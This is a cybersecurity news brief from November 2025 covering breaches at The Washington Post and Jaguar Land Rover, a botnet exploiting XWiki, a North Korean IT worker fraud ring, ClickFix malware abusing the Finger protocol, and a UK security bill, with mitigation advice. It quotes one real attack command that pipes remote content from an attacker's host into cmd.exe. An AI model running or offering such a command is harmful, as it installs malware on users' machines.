svoboda.center Logo svoboda.center

Svoboda Cybersecurity Brief November 16, 2025

Private VPN — just $1.2/mo

Washington Post Data Breach Exposes Sensitive Employee Data

A cyberattack on The Washington Post compromised personal data of 9,720 employees and contractors, including Social Security numbers, bank account details, and tax IDs. The breach occurred between July 10 and August 22, 2025, exploiting a previously unknown vulnerability in Oracle E-Business Suite. High-profile individuals like former national security advisor John Bolton were affected.
Impact: Significant financial and identity theft risks for victims.
Mitigation: Oracle has patched the vulnerability; affected individuals should monitor financial accounts and enable credit freezes.
Source: DataBreaches.net

Jaguar Land Rover Cyberattack Costs $220 Million

A September 2025 cyberattack by Scattered Lapsus$ Hunters disrupted production at Jaguar Land Rover (JLR), leading to a $220 million loss and forcing UK government intervention with a £1.5 billion loan. Data was stolen, and production resumed October 8 after weeks of shutdowns.
Source: BleepingComputer

RondoDox Botnet Exploits Unpatched XWiki Servers

The RondoDox botnet is actively exploiting CVE-2025-24893, a critical eval injection flaw in XWiki (patched in versions 15.10.11, 16.4.1, and 16.5.0RC1), to enslave devices for DDoS attacks. Attacks surged in November 2025, alongside cryptocurrency miners and reverse shells.
Impact: Unpatched servers risk arbitrary code execution and botnet enrollment.
Mitigation: Update XWiki to patched versions; block unauthorized access to /bin/get/Main/SolrSearch.
Source: The Hacker News

North Korean IT Worker Fraud Ring Uncovered

Five U.S. citizens pleaded guilty to facilitating North Korean IT workers in infiltrating 136 U.S. companies, earning over $2.2 million for the regime. The scheme involved identity theft, laptop farms, and remote desktop software to bypass employment checks.
Source: The Hacker News

Finger Protocol Abused in ClickFix Malware Campaigns

Threat actors are abusing the legacy Finger protocol (port 79) to deliver malware via commands like finger vke@finger.cloudmega[.]org | cmd. Attacks deploy infostealers or the NetSupport Manager RAT, evading detection by piping commands through cmd.exe.
Impact: Remote code execution and persistent RAT infections.
Mitigation: Block outgoing TCP port 79; educate users on social engineering tactics.
Source: BleepingComputer

UK Introduces Cyber Security and Resilience Bill

The UK government proposed a bill expanding the NIS Regulations 2018 to include medium/large data centers, managed IT providers, and critical suppliers. Requirements include incident reporting and stricter security standards, aligning with the EU’s NIS2 Directive.
Source: DataBreaches.net

Share this brief: https://svo.bz/XiPA

If you want to support us, you can donate here: Donate